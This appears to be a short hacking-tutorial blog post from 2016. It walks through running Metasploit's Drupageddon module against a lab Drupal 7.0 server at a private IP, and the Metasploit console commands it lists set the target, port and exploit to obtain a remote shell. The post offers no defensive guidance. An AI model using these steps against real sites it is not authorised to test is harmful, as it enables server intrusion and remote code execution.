Hack Drupal Website Server using Drupal HTTP Parameter Key/Value SQL Injection

at 7:40 AM Monday, May 9, 2016
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

Exploit Targets
Drupal 7.0

Requirement
Attacker: kali Linux
Victim PC: Drupal 7.0


Open Kali terminal type msfconsole


Now type use exploit/multi/http/drupal_drupageddon
msf exploit (drupal_drupageddon)>set targeturi /drupal/
msf exploit (drupal_drupageddon)>set rhost 192.168.0.109 (IP of Remote Host)
msf exploit (drupal_drupageddon)>set rport 80
msf exploit (drupal_drupageddon)>exploit         
   
Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)